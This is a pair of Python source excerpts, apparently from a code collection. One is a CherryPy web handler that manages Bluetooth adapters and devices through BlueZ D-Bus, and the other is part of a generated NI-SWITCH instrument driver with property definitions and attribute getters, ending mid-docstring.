if not filters or pass_property.lower() in filters:
controller_result[pass_property.lower()] = adapter_props.Get(ADAPTER_IFACE, pass_property)
matched_filter = True
result[controller_friendly_name] = controller_result
if filters and not matched_filter:
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
result['InfoMsg'] = f"filters {filters} not matched"
return result
else:
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
device, device_props = find_device(bus, device_uuid)
if not device:
result['InfoMsg'] = 'Device not found'
return result
result.update(device_props)
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
except Exception as e:
result['InfoMsg'] = str(e)
cherrypy.log(str(e))
return result
@cherrypy.tools.json_in()
@cherrypy.tools.accept(media='application/json')
@cherrypy.tools.json_out()
def PUT(self, *args, **kwargs):
result = {
'SDCERR': weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1),
'InfoMsg': '',
}
if 'controller' in cherrypy.request.params:
controller_name = cherrypy.request.params['controller'].replace("controller", "hci")
else:
controller_name = None
if 'device' in cherrypy.request.params:
device_uuid = uri_to_uuid(cherrypy.request.params['device'])
else:
device_uuid = None
post_data = cherrypy.request.json
bus, adapter_obj, get_controller_result = GetControllerObj(controller_name)
result.update(get_controller_result)
if not adapter_obj:
return result
try:
adapter_props = dbus.Interface(adapter_obj, "org.freedesktop.DBus.Properties")
adapter_methods = dbus.Interface(adapter_obj, "org.freedesktop.DBus.Methods")
if not device_uuid:
result.update(self.set_adapter_properties(adapter_methods, adapter_props,
controller_name, post_data))
else:
# device_uuid specified
device, device_props = find_device(bus, device_uuid)
if device is None:
result['InfoMsg'] = 'Device not found'
return result
device_obj = bus.get_object(BLUEZ_SERVICE_NAME, device)
device_methods = dbus.Interface(device_obj, "org.freedesktop.DBus.Methods")
device_properties = dbus.Interface(device_obj, "org.freedesktop.DBus.Properties")
if 'command' in post_data:
command = post_data['command']
result.update(self.execute_device_command(bus, command, device_uuid, device))
return result
else:
result = self.set_device_properties(adapter_methods, device_methods, device_obj, device_properties,
post_data)
except Exception as e:
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
result['InfoMsg'] = str(e)
cherrypy.log(str(e))
return result
def set_adapter_properties(self, adapter_methods, adapter_props, controller_name, post_data):
"""Set properties on an adapter (controller)"""
result = {}
powered = post_data.get('powered', None)
discovering = post_data.get('discovering', None)
discoverable = post_data.get('discoverable', None)
transport_filter = post_data.get('transportFilter', None)
if powered is not None:
adapter_props.Set(ADAPTER_IFACE, "Powered", dbus.Boolean(powered))
if not powered:
# Do not attempt to set discoverable or discovering state if powering off
discoverable = discoverable if discoverable else None
discovering = discovering if discovering else None
if discoverable is not None:
adapter_props.Set(ADAPTER_IFACE, "Discoverable", dbus.Boolean(discoverable))
if transport_filter is not None:
result.update(self.set_adapter_transport_filter(adapter_methods, controller_name,
transport_filter))
if discovering is not None:
discovering_state = adapter_props.Get(ADAPTER_IFACE, "Discovering")
if discovering_state != discovering:
if discovering:
adapter_methods.get_dbus_method("StartDiscovery", ADAPTER_IFACE)()
else:
adapter_methods.get_dbus_method("StopDiscovery", ADAPTER_IFACE)()
if 'SDCERR' not in result:
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
return result
def get_adapter_transport_filter(self, controller_name):
if controller_name in self.controller_state and 'Transport' in self.controller_state[
controller_name]:
return self.controller_state[controller_name]['Transport']
else:
return None
def set_adapter_transport_filter(self, adapter_methods, controller_name, transport_filter):
""" Set a transport filter on the controller. Note that "When multiple clients call
SetDiscoveryFilter, their filters are internally merged" """
result = {}
discovery_filters = { 'Transport': transport_filter }
discovery_filters_dbus = python_to_dbus(discovery_filters)
try:
adapter_methods.get_dbus_method("SetDiscoveryFilter", ADAPTER_IFACE)(discovery_filters_dbus)
except dbus.DBusException as e:
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
result['InfoMsg'] = f"Transport filter {transport_filter} not accepted"
return result
if not controller_name in self.controller_state:
self.controller_state[controller_name] = { }
self.controller_state[controller_name]['Transport'] = transport_filter
return result
def set_device_properties(self, adapter_methods, device_methods, device_obj, device_properties, post_data):
result = {}
for settable_property in SETTABLE_DEVICE_PROPS:
prop_name, prop_type = settable_property
value = post_data.get(prop_name.lower(), None)
if value is not None:
device_properties.Set(DEVICE_IFACE, prop_name, python_to_dbus(
value, prop_type))
paired = post_data.get('paired', None)
if paired == 1:
paired_state = device_properties.Get(DEVICE_IFACE, "Paired")
if paired_state != paired:
agent = AgentSingleton()
bus = dbus.SystemBus()
bus.call_blocking(bus_name=BLUEZ_SERVICE_NAME, object_path=device_obj.object_path,
dbus_interface=DEVICE_IFACE,
method="Pair", signature='', args=[],
timeout=PAIR_TIMEOUT_SECONDS)
elif paired == 0:
adapter_methods.get_dbus_method("RemoveDevice", ADAPTER_IFACE)(device_obj)
# If RemoveDevice is successful, further work on device will not be possible.
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
return result
connected = post_data.get('connected', None)
connected_state = device_properties.Get(DEVICE_IFACE, "Connected")
if connected_state != connected:
if connected == 1:
# Note - device may need to be paired prior to connecting
# AgentSingleton can be registered to allow BlueZ to auto-pair (without bonding)
agent = AgentSingleton()
device_methods.get_dbus_method("Connect", DEVICE_IFACE)()
elif connected == 0:
device_methods.get_dbus_method("Disconnect", DEVICE_IFACE)()
passkey = post_data.get('passkey', None)
if passkey is not None:
agent_instance = AgentSingleton.get_instance()
if agent_instance:
agent_instance.passkeys[device_obj.object_path] = passkey
# Found device, set any requested properties. Assume success.
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
return result
def execute_device_command(self, bus, command, device_uuid: str, device: dbus.ObjectPath):
result = {}
error_message = None
processed = False
post_data = cherrypy.request.json
for plugin in bluetooth_plugins:
try:
processed, error_message = plugin.ProcessDeviceCommand(bus, command, device_uuid,
device, post_data)
except Exception as e:
processed = True
error_message = f"Command {command} failed with {str(e)}"
break
if processed:
break
if not processed:
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
result['InfoMsg'] = f"Unrecognized command {command}"
elif error_message:
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
result['InfoMsg'] = error_message
else:
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_SUCCESS')
return result
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
# This file was generated
import array # noqa: F401
import ctypes
import datetime # noqa: F401
# Used by @ivi_synchronized
from functools import wraps
import niswitch._attributes as _attributes
import niswitch._converters as _converters
import niswitch._library_singleton as _library_singleton
import niswitch._visatype as _visatype
import niswitch.enums as enums
import niswitch.errors as errors
# Used for __repr__
import pprint
pp = pprint.PrettyPrinter(indent=4)
# Helper functions for creating ctypes needed for calling into the driver DLL
def get_ctypes_pointer_for_buffer(value=None, library_type=None, size=None):
if isinstance(value, array.array):
assert library_type is not None, 'library_type is required for array.array'
addr, _ = value.buffer_info()
return ctypes.cast(addr, ctypes.POINTER(library_type))
elif str(type(value)).find("'numpy.ndarray'") != -1:
import numpy
return numpy.ctypeslib.as_ctypes(value)
elif isinstance(value, list):
assert library_type is not None, 'library_type is required for list'
return (library_type * len(value))(*value)
else:
if library_type is not None and size is not None:
return (library_type * size)()
else:
return None
def get_ctypes_and_array(value, array_type):
if value is not None:
if isinstance(value, array.array):
value_array = value
else:
value_array = array.array(array_type, value)
else:
value_array = None
return value_array
class _Scan(object):
def __init__(self, session):
self._session = session
self._session._initiate_scan()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self._session.abort()
# From https://stackoverflow.com/questions/5929107/decorators-with-parameters
def ivi_synchronized(f):
@wraps(f)
def aux(*xs, **kws):
session = xs[0] # parameter 0 is 'self' which is the session object
with session.lock():
return f(*xs, **kws)
return aux
class _Lock(object):
def __init__(self, session):
self._session = session
def __enter__(self):
# _lock_session is called from the lock() function, not here
return self
def __exit__(self, exc_type, exc_value, traceback):
self._session.unlock()
class _RepeatedCapabilities(object):
def __init__(self, session, prefix):
self._session = session
self._prefix = prefix
def __getitem__(self, repeated_capability):
'''Set/get properties or call methods with a repeated capability (i.e. channels)'''
rep_caps_list = _converters.convert_repeated_capabilities(repeated_capability, self._prefix)
return _SessionBase(vi=self._session._vi, repeated_capability_list=rep_caps_list, library=self._session._library, encoding=self._session._encoding, freeze_it=True)
# This is a very simple context manager we can use when we need to set/get attributes
# or call functions from _SessionBase that require no channels. It is tied to the specific
# implementation of _SessionBase and how repeated capabilities are handled.
class _NoChannel(object):
def __init__(self, session):
self._session = session
def __enter__(self):
self._repeated_capability_cache = self._session._repeated_capability
self._session._repeated_capability = ''
def __exit__(self, exc_type, exc_value, traceback):
self._session._repeated_capability = self._repeated_capability_cache
class _SessionBase(object):
'''Base class for all NI-SWITCH sessions.'''
# This is needed during __init__. Without it, __setattr__ raises an exception
_is_frozen = False
analog_bus_sharing_enable = _attributes.AttributeViBoolean(1150018)
'''Type: bool
Enables or disables sharing of an analog bus line so that multiple NI SwitchBlock devices may connect to it simultaneously. To enable multiple NI SwitchBlock devices to share an analog bus line, set this property to True for each device on the channel that corresponds with the shared analog bus line. The default value for all devices is False, which disables sharing of the analog bus.
Refer to the Using the Analog Bus on an NI SwitchBlock Carrier topic in the NI Switches Help for more information about sharing the analog bus.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
session.channels[0,1].analog_bus_sharing_enable = var
var = session.channels[0,1].analog_bus_sharing_enable
'''
bandwidth = _attributes.AttributeViReal64(1250005)
'''Type: float
This channel-based property returns the bandwidth for the channel.
The units are hertz.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].bandwidth
'''
channel_count = _attributes.AttributeViInt32(1050203)
'''Type: int
Indicates the number of channels that the specific instrument driver supports.
'''
characteristic_impedance = _attributes.AttributeViReal64(1250016)
'''Type: float
This channel-based property returns the characteristic impedance for the channel.
The units are ohms.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].characteristic_impedance
'''
continuous_scan = _attributes.AttributeViBoolean(1250026)
'''Type: bool
When a switch device is scanning, the swich can either stop scanning when the end of the scan (False) or continue scanning from the top of the scan list again (True).
Notice that if you set the scan to continuous (True), the Wait For Scan Complete operation will always time out and you must call Abort to stop the scan.
'''
digital_filter_enable = _attributes.AttributeViBoolean(1150016)
'''Type: bool
This property specifies whether to apply the pulse width filter to the Trigger Input. Enabling the Digital Filter (True) prevents the switch module from being triggered by pulses that are less than 150 ns on PXI trigger lines 0–7.
When Digital Filter is disabled (False), it is possible for the switch module to be triggered by noise on the PXI trigger lines. If the device triggering the switch is capable of sending pulses greater than 150 ns, you should not disable the Digital Filter.
'''
driver_setup = _attributes.AttributeViString(1050007)
'''Type: str
This property indicates the Driver Setup string that the user specified when initializing the driver.
Some cases exist where the end-user must specify instrument driver options at initialization time. An example of this is specifying a particular instrument model from among a family of instruments that the driver supports. This is useful when using simulation. The end-user can specify driver-specific options through the DriverSetup keyword in the optionsString parameter to the InitWithOptions method, or through the IVI Configuration Utility.
If the user does not specify a Driver Setup string, this property returns an empty string.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
handshaking_initiation = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.HandshakingInitiation, 1150013)
instrument_firmware_revision = _attributes.AttributeViString(1050510)
'''Type: str
A string that contains the firmware revision information for the instrument you are currently using.
'''
instrument_manufacturer = _attributes.AttributeViString(1050511)
'''Type: str
A string that contains the name of the instrument manufacturer you are currently using.
'''
instrument_model = _attributes.AttributeViString(1050512)
'''Type: str
A string that contains the model number or name of the instrument that you are currently using.
'''
io_resource_descriptor = _attributes.AttributeViString(1050304)
'''Type: str
Indicates the resource descriptor the driver uses to identify the physical device.
If you initialize the driver with a logical name, this property contains the resource descriptor that corresponds to the entry in the IVI Configuration utility.
If you initialize the instrument driver with the resource descriptor, this property contains that value.
'''
is_configuration_channel = _attributes.AttributeViBoolean(1250003)
'''Type: bool
This channel-based property specifies whether to reserve the channel for internal path creation. A channel that is available for internal path creation is called a configuration channel. The driver may use configuration channels to create paths between two channels you specify in the connect method. Configuration channels are not available for external connections.
Set this property to True to mark the channel as a configuration channel. Set this property to False to mark the channel as available for external connections.
After you identify a channel as a configuration channel, you cannot use that channel for external connections. The connect method returns the NISWITCH_ERROR_IS_CONFIGURATION_CHANNEL error when you attempt to establish a connection between a configuration channel and any other channel.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
session.channels[0,1].is_configuration_channel = var
var = session.channels[0,1].is_configuration_channel
'''
is_debounced = _attributes.AttributeViBoolean(1250002)
'''Type: bool
This property indicates whether the entire switch device has settled since the last switching command. A value of True indicates that all signals going through the switch device are valid.
'''
is_scanning = _attributes.AttributeViBoolean(1250024)
'''Type: bool
If True, the switch module is currently scanning through the scan list (i.e. it is not in the Idle state). If False, the switch module is not currently scanning through the scan list (i.e. it is in the Idle state).
'''
is_source_channel = _attributes.AttributeViBoolean(1250001)
'''Type: bool
This channel-based property specifies whether you want to identify the channel as a source channel. Typically, you set this property to True when you attach the channel to a power supply, a method generator, or an active measurement point on the unit under test, and you do not want to connect the channel to another source. The driver prevents source channels from connecting to each other. The connect method returns the NISWITCH_ERROR_ATTEMPT_TO_CONNECT_SOURCES when you attempt to connect two channels that you identify as source channels.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
session.channels[0,1].is_source_channel = var
var = session.channels[0,1].is_source_channel
'''
is_waiting_for_trig = _attributes.AttributeViBoolean(1150004)
'''Type: bool
In a scan list, a semi-colon (;) is used to indicate that at that point in the scan list, the scan engine should pause until a trigger is received from the trigger input. If that trigger is user generated through either a hardware pulse or the Send SW Trigger operation, it is necessary for the user to know when the scan engine has reached such a state.
'''
logical_name = _attributes.AttributeViString(1050305)
'''Type: str
A string containing the logical name you specified when opening the current IVI session.
You may pass a logical name to the init or InitWithOptions methods. The IVI Configuration utility must contain an entry for the logical name. The logical name entry refers to a virtual instrument section in the IVI Configuration file. The virtual instrument section specifies a physical device and initial user options.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
max_ac_voltage = _attributes.AttributeViReal64(1250007)
'''Type: float
This channel-based property returns the maximum AC voltage the channel can switch.
The units are volts RMS.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_ac_voltage
'''
max_carry_ac_current = _attributes.AttributeViReal64(1250011)
'''Type: float
This channel-based property returns the maximum AC current the channel can carry.
The units are amperes RMS.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_carry_ac_current
'''
max_carry_ac_power = _attributes.AttributeViReal64(1250015)
'''Type: float
This channel-based property returns the maximum AC power the channel can carry.
The units are volt-amperes.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_carry_ac_power
'''
max_carry_dc_current = _attributes.AttributeViReal64(1250010)
'''Type: float
This channel-based property returns the maximum DC current the channel can carry.
The units are amperes.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_carry_dc_current
'''
max_carry_dc_power = _attributes.AttributeViReal64(1250014)
'''Type: float
This channel-based property returns the maximum DC power the channel can carry.
The units are watts.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_carry_dc_power
'''
max_dc_voltage = _attributes.AttributeViReal64(1250006)
'''Type: float
This channel-based property returns the maximum DC voltage the channel can switch.
The units are volts.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_dc_voltage
'''
max_switching_ac_current = _attributes.AttributeViReal64(1250009)
'''Type: float
This channel-based property returns the maximum AC current the channel can switch.
The units are amperes RMS.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_switching_ac_current
'''
max_switching_ac_power = _attributes.AttributeViReal64(1250013)
'''Type: float
This channel-based property returns the maximum AC power the channel can switch.
The units are volt-amperes.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_switching_ac_power
'''
max_switching_dc_current = _attributes.AttributeViReal64(1250008)
'''Type: float
This channel-based property returns the maximum DC current the channel can switch.
The units are amperes.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_switching_dc_current
'''
max_switching_dc_power = _attributes.AttributeViReal64(1250012)
'''Type: float
This channel-based property returns the maximum DC power the channel can switch.
The units are watts.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].max_switching_dc_power
'''
number_of_relays = _attributes.AttributeViInt32(1150014)
'''Type: int
This property returns the number of relays.
'''
num_of_columns = _attributes.AttributeViInt32(1250019)
'''Type: int
This property returns the number of channels on the column of a matrix or scanner. If the switch device is a scanner, this value is the number of input channels.
The wire_mode property affects the number of available columns. For example, if your device has 8 input lines and you use the four-wire mode, then the number of columns you have available is 2.
'''
num_of_rows = _attributes.AttributeViInt32(1250018)
'''Type: int
This property returns the number of channels on the row of a matrix or scanner. If the switch device is a scanner, this value is the number of output channels.
The wire_mode property affects the number of available rows. For example, if your device has 8 input lines and you use the two-wire mode, then the number of columns you have available is 4.
'''
power_down_latching_relays_after_debounce = _attributes.AttributeViBoolean(1150017)
'''Type: bool
This property specifies whether to power down latching relays after calling Wait For Debounce.
When Power Down Latching Relays After Debounce is enabled (True), a call to Wait For Debounce ensures that the relays are settled and the latching relays are powered down.
'''
scan_advanced_output = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.ScanAdvancedOutput, 1250023)
'''Type: enums.ScanAdvancedOutput
This property specifies the method you want to use to notify another instrument that all signals going through the switch device have settled following the processing of one entry in the scan list.
'''
scan_advanced_polarity = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.ScanAdvancedPolarity, 1150011)
scan_delay = _attributes.AttributeViReal64TimeDeltaSeconds(1250025)
'''Type: float in seconds or datetime.timedelta
This property specifies the minimum amount of time the switch device waits before it asserts the scan advanced output trigger after opening or closing the switch. The switch device always waits for debounce before asserting the trigger. The units are seconds.
the greater value of the settling time and the value you specify as the scan delay.
Note: NI PXI-2501/2503/2565/2590/2591 Users--the actual delay will always be
'''
scan_list = _attributes.AttributeViString(1250020)
'''Type: str
This property contains a scan list, which is a string that specifies channel connections and trigger conditions. The initiate method makes or breaks connections and waits for triggers according to the instructions in the scan list.
The scan list is comprised of channel names that you separate with special characters. These special characters determine the operations the scanner performs on the channels when it executes this scan list.
To create a path between two channels, use the following character between the two channel names:
-> (a dash followed by a '>' sign)
Example: 'CH1->CH2' tells the switch to make a path from channel CH1 to channel CH2.
To break or clear a path, use the following character as a prefix before the path:
~ (tilde)
Example: '~CH1->CH2' tells the switch to break the path from channel CH1 to channel CH2.
To tell the switch device to wait for a trigger event, use the following character as a separator between paths:
; (semi-colon)
Example: 'CH1->CH2;CH3->CH4' tells the switch to make the path from channel CH1 to channel CH2, wait for a trigger, and then make the path from CH3 to CH4.
'''
scan_mode = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.ScanMode, 1250021)
'''Type: enums.ScanMode
This property specifies what happens to existing connections that conflict with the connections you make in a scan list. For example, if CH1 is already connected to CH2 and the scan list instructs the switch device to connect CH1 to CH3, this property specifies what happens to the connection between CH1 and CH2.
If the value of this property is ScanMode.NONE, the switch device takes no action on existing paths. If the value is ScanMode.BREAK_BEFORE_MAKE, the switch device breaks conflicting paths before making new ones. If the value is ScanMode.BREAK_AFTER_MAKE, the switch device breaks conflicting paths after making new ones.
Most switch devices support only one of the possible values. In such cases, this property serves as an indicator of the device's behavior.
Note:
One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
'''
serial_number = _attributes.AttributeViString(1150015)
'''Type: str
This read-only property returns the serial number for the switch device controlled by this instrument driver. If the device does not return a serial number, the driver returns the IVI_ERROR_ATTRIBUTE_NOT_SUPPORTED error.
'''
settling_time = _attributes.AttributeViReal64TimeDeltaSeconds(1250004)
'''Type: float in seconds or datetime.timedelta
This channel-based property returns the maximum length of time from after you make a connection until the signal flowing through the channel settles. The units are seconds.
the greater value of the settling time and the value you specify as the scan delay.
Note: NI PXI-2501/2503/2565/2590/2591 Users--the actual delay will always be
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
session.channels[0,1].settling_time = var
var = session.channels[0,1].settling_time
'''
simulate = _attributes.AttributeViBoolean(1050005)
'''Type: bool
Specifies whether or not to simulate instrument driver I/O operations. If simulation is enabled, instrument driver methods perform range checking and call Ivi_GetAttribute and Ivi_SetAttribute methods, but they do not perform instrument I/O. For output parameters that represent instrument data, the instrument driver methods return calculated values.
The default value is False. Use the InitWithOptions method to override this value.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
specific_driver_description = _attributes.AttributeViString(1050514)
'''Type: str
A string that contains a brief description of the specific driver.
'''
specific_driver_revision = _attributes.AttributeViString(1050551)
'''Type: str
A string that contains additional version information about this instrument driver.
'''
specific_driver_vendor = _attributes.AttributeViString(1050513)
'''Type: str
A string that contains the name of the vendor that supplies this driver.
'''
supported_instrument_models = _attributes.AttributeViString(1050327)
'''Type: str
Contains a comma-separated list of supported instrument models.
'''
temperature = _attributes.AttributeViReal64(1150019)
'''Type: float
This property returns the temperature as read by the Switch module. The units are degrees Celsius.
'''
trigger_input = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.TriggerInput, 1250022)
'''Type: enums.TriggerInput
This property specifies the source of the trigger for which the switch device can wait when processing a scan list. The switch device waits for a trigger when it encounters a semi-colon in a scan list. When the trigger occurs, the switch device advances to the next entry in the scan list.
'''
trigger_input_polarity = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.TriggerInputPolarity, 1150010)
'''Type: enums.TriggerInputPolarity
Determines the behavior of the trigger Input.
'''
wire_mode = _attributes.AttributeViInt32(1250017)
'''Type: int
This property returns the wire mode of the switch device.
This property affects the values of the num_of_rows and num_of_columns properties. The actual number of input and output lines on the switch device is fixed, but the number of channels depends on how many lines constitute each channel.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].wire_mode
'''
def __init__(self, repeated_capability_list, vi, library, encoding, freeze_it=False):
self._repeated_capability_list = repeated_capability_list
self._repeated_capability = ','.join(repeated_capability_list)
self._vi = vi
self._library = library
self._encoding = encoding
# Store the parameter list for later printing in __repr__
param_list = []
param_list.append("repeated_capability_list=" + pp.pformat(repeated_capability_list))
param_list.append("vi=" + pp.pformat(vi))
param_list.append("library=" + pp.pformat(library))
param_list.append("encoding=" + pp.pformat(encoding))
self._param_list = ', '.join(param_list)
self._is_frozen = freeze_it
def __repr__(self):
return '{0}.{1}({2})'.format('niswitch', self.__class__.__name__, self._param_list)
def __setattr__(self, key, value):
if self._is_frozen and key not in dir(self):
raise AttributeError("'{0}' object has no attribute '{1}'".format(type(self).__name__, key))
object.__setattr__(self, key, value)
def _get_error_description(self, error_code):
'''_get_error_description
Returns the error description.
'''
try:
_, error_string = self._get_error()
return error_string
except errors.Error:
pass
try:
'''
It is expected for _get_error to raise when the session is invalid
(IVI spec requires GetError to fail).
Use _error_message instead. It doesn't require a session.
'''
error_string = self._error_message(error_code)
return error_string
except errors.Error:
return "Failed to retrieve error description."
''' These are code-generated '''
@ivi_synchronized
def _get_attribute_vi_boolean(self, attribute_id):
r'''_get_attribute_vi_boolean
This method queries the value of a ViBoolean property. You can use
this method to get the values of instrument specific properties and
inherent IVI properties. If the property represents an instrument
state, this method performs instrument I/O in the following cases: -
State caching is disabled for the entire session or for the particular
property. - State caching is enabled and the currently cached value is
invalid.
Tip:
This method requires repeated capabilities (channels). If called directly on the
niswitch.Session object, then the method will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling this method on the result.:
session.channels[0,1]._get_attribute_vi_boolean(attribute_id)
Args:
attribute_id (int): Pass the ID of a property. From the method panel window, you can use
this control as follows. - Click on the control or press , , or , to
display a dialog box containing a hierarchical list of the available
properties. Properties whose value cannot be set are dim. Help text is
shown for each property. Select a property by double-clicking on it
or by selecting it and then pressing . A ring control at the top of the
dialog box allows you to see all IVI properties or only the properties
of the ViInt32 type. If you choose to see all IVI properties, the data
types appear to the right of the property names in the list box. The
data types that are not consistent with this method are dim. If you
select a property data type that is dim, LabWindows/CVI transfers you
to the method panel for the corresponding method that is consistent
with the data type. - If you want to enter a variable name, press to
change this ring control to a manual input box. - If the property in
this ring control has constants as valid values, you can view the
constants by moving to the Property Value control and pressing .
Returns:
attribute_value (bool): Returns the current value of the property. Pass the address of a
ViBoolean variable. From the method panel window, you can use this
control as follows. - If the property currently showing in the
Property ID ring control has constants as valid values, you can view a
list of the constants by pressing on this control. Select a value by
double-clicking on it or by selecting it and then pressing .
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)) # case C010
attribute_id_ctype = _visatype.ViAttr(attribute_id) # case S150
attribute_value_ctype = _visatype.ViBoolean() # case S220
error_code = self._library.niSwitch_GetAttributeViBoolean(vi_ctype, channel_name_ctype, attribute_id_ctype, None if attribute_value_ctype is None else (ctypes.pointer(attribute_value_ctype)))
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return bool(attribute_value_ctype.value)
@ivi_synchronized
def _get_attribute_vi_int32(self, attribute_id):
r'''_get_attribute_vi_int32
This method queries the value of a ViInt32 property. You can use this
method to get the values of instrument specific properties and
inherent IVI properties. If the property represents an instrument
state, this method performs instrument I/O in the following cases: -
State caching is disabled for the entire session or for the particular
property. - State caching is enabled and the currently cached value is
invalid.
Tip:
This method requires repeated capabilities (channels). If called directly on the
niswitch.Session object, then the method will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling this method on the result.:
session.channels[0,1]._get_attribute_vi_int32(attribute_id)
Args:
attribute_id (int): Pass the ID of a property. From the method panel window, you can use
this control as follows. - Click on the control or press , , or , to
display a dialog box containing a hierarchical list of the available
properties. Properties whose value cannot be set are dim. Help text is
shown for each property. Select a property by double-clicking on it
or by selecting it and then pressing . A ring control at the top of the
dialog box allows you to see all IVI properties or only the properties
of the ViInt32 type. If you choose to see all IVI properties, the data
types appear to the right of the property names in the list box. The
data types that are not consistent with this method are dim. If you
select a property data type that is dim, LabWindows/CVI transfers you
to the method panel for the corresponding method that is consistent
with the data type. - If you want to enter a variable name, press to
change this ring control to a manual input box. - If the property in
this ring control has constants as valid values, you can view the
constants by moving to the Property Value control and pressing .
Returns:
attribute_value (int): Returns the current value of the property. Pass the address of a
ViInt32 variable. From the method panel window, you can use this
control as follows. - If the property currently showing in the
Property ID ring control has constants as valid values, you can view a
list of the constants by pressing on this control. Select a value by
